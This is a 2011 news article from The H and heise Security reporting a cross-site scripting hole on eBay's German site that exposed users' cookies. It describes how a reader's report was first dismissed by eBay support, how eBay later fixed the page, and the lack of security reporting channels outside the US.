In association with heise online

10 August 2011, 12:05

Potential account theft with XSS hole in

  • Twitter
  • Facebook
  • submit to slashdot
  • StumbleUpon
  • submit to reddit

eBay XSS
Zoom An XSS hole in enables attackers to steal users' cookies
Source: heise Security
A serious security hole in enabled attackers to steal other users' cookies and take control of their accounts. It is not believed that this particular flaw affected any other national eBay sites.

On one of the online auctioneers' subpages, a URL parameter was insufficiently checked before being returned as part of the web page. This made it vulnerable to cross-site scripting (XSS) attacks. Attackers were able to generate links to which, when called, executed arbitrary JavaScript code within the context of eBay's German domain.

This allowed potential attackers to read cookies and transmit them to a third party server. The hole was discovered by heise Security reader Daniel Sparka. The H's associates at heise Security were told that when Sparka notified eBay of the hole using the site's contact form, the company merely sent a standard reply advising him to delete the temporary files in his browser. The eBay support person apparently thought that the reported hole was an access problem caused by the customer's system. Sparka then contacted heise Security.

Talking to heise Security, eBay confirmed the problem and took the affected page offline within 24 hours of the call. The press spokeswoman also confirmed that the general contact form is the only way for customers to report critical security holes; which is exactly what the heise Security reader tried to do, without success. There is no direct contact for security-related issues. The US eBay site has a vulnerability reporting page; however, it appears that this only exists in the US, with no equivalent in the UK or on other national eBay sites. One can only hope that whoever, outside the US, discovers the next critical hole won't be fobbed off with general browser tips.


Print Version | Send by email | Permalink:

  • July's Community Calendar

The H Open

The H Security

The H Developer

The H Internet Toolkit